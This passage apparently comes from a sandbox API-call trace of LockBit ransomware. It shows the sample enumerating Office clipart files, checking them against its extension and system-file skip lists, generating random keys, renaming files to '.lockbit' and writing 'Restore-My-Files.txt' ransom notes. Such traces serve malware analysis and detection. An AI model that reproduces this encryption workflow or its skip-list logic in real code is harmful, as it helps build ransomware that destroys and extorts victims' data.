0x753f0000 [0108.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.538] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.546] malloc (_Size=0xa6) returned 0x77d800 [0108.546] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.546] free (_Block=0x77d800) [0108.546] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.546] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.546] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbde25400, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbde25400, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00269_.WMF", cAlternateFileName="")) returned 1 [0108.546] lstrcmpiW (lpString1=".", lpString2="BL00269_.WMF") returned -1 [0108.547] lstrcmpiW (lpString1="..", lpString2="BL00269_.WMF") returned -1 [0108.547] PathFindExtensionW (pszPath="BL00269_.WMF") returned=".WMF" [0108.547] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.547] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.547] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00269_.WMF") returned 1 [0108.548] lstrcmpiW (lpString1="ntldr", lpString2="BL00269_.WMF") returned 1 [0108.548] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00269_.WMF") returned 1 [0108.548] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00269_.WMF") returned 1 [0108.548] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00269_.WMF") returned -1 [0108.548] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00269_.WMF") returned 1 [0108.548] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00269_.WMF") returned 1 [0108.548] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.548] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned=".WMF" [0108.548] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.548] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.548] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.549] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.549] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.lockbit") returned 72 [0108.549] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.550] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.550] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.550] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5272) returned 1 [0108.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.551] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.555] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.555] malloc (_Size=0xa6) returned 0x77d800 [0108.555] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0108.557] free (_Block=0x77d800) [0108.557] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.557] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.557] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d095f00, ftCreationTime.dwHighDateTime=0x1bd4b18, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d095f00, ftLastWriteTime.dwHighDateTime=0x1bd4b18, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00270_.WMF", cAlternateFileName="")) returned 1 [0108.557] lstrcmpiW (lpString1=".", lpString2="BL00270_.WMF") returned -1 [0108.557] lstrcmpiW (lpString1="..", lpString2="BL00270_.WMF") returned -1 [0108.557] PathFindExtensionW (pszPath="BL00270_.WMF") returned=".WMF" [0108.557] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.557] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.558] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.558] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00270_.WMF") returned 1 [0108.559] lstrcmpiW (lpString1="ntldr", lpString2="BL00270_.WMF") returned 1 [0108.559] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00270_.WMF") returned 1 [0108.559] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00270_.WMF") returned 1 [0108.559] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00270_.WMF") returned -1 [0108.559] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00270_.WMF") returned 1 [0108.559] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00270_.WMF") returned 1 [0108.559] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.559] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned=".WMF" [0108.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.559] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.559] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.560] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.560] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.lockbit") returned 72 [0108.560] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.562] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.562] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.562] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3016) returned 1 [0108.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.563] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.563] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.569] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.570] malloc (_Size=0xa6) returned 0x77d800 [0108.570] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.570] free (_Block=0x77d800) [0108.570] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.570] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.570] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.570] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd2a9800, ftCreationTime.dwHighDateTime=0x1bd4b17, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd2a9800, ftLastWriteTime.dwHighDateTime=0x1bd4b17, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00273_.WMF", cAlternateFileName="")) returned 1 [0108.570] lstrcmpiW (lpString1=".", lpString2="BL00273_.WMF") returned -1 [0108.570] lstrcmpiW (lpString1="..", lpString2="BL00273_.WMF") returned -1 [0108.570] PathFindExtensionW (pszPath="BL00273_.WMF") returned=".WMF" [0108.570] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.570] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.571] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.571] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00273_.WMF") returned 1 [0108.571] lstrcmpiW (lpString1="ntldr", lpString2="BL00273_.WMF") returned 1 [0108.571] lstrcmpiW (lpString1="ntuser.dat.log", 